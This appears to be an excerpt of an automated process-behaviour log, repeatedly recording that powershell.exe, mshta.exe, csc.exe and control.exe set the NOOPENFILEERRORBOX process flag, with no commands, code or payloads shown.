Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
